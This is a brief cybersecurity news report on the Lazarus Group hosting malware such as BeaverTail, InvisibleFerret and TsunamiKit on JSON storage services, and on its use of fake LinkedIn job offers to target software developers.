In a recent wave of cyber threats, the Lazarus Group, a North Korean state-sponsored hacking organization, has been utilizing JSON storage services to host malicious software. This tactic was highlighted by cybersecurity researchers from NVISIO, who noted the group’s use of platforms such as JSON Keeper, JSONsilo, and npoint.io to enhance their stealth and persistence in cyberattacks.
Malware Delivery Tactics
The attackers have been luring victims through deceptive LinkedIn job offers, which serve as a gateway to deploying various types of malware, including BeaverTail, InvisibleFerret, and TsunamiKit. The latter is particularly noteworthy as it is a multi-stage malware toolkit developed in Python and .NET, capable of functioning as either an information stealer or a cryptojacker. When activated, it installs XMRig on compromised devices, forcing them to mine Monero, a popular cryptocurrency.
Researchers have also observed the deployment of additional malware variants, such as Tropidoor and AkdoorTea, through the BeaverTrail framework. This multifaceted approach indicates a strategic effort to target software developers who may possess valuable information.
“It’s clear that the actors behind Contagious Interview are not lagging behind and are trying to cast a very wide net to compromise any software developer that might seem interesting to them, resulting in exfiltration of sensitive data and crypto wallet information,” the researchers cautioned.
The choice to exploit legitimate websites like JSON Keeper and JSON Silo, along with popular code repositories such as GitLab and GitHub, underscores the attackers’ intent to operate discreetly, blending their malicious activities with normal internet traffic. This sophisticated method not only enhances their chances of success but also poses a significant threat to the cybersecurity landscape.
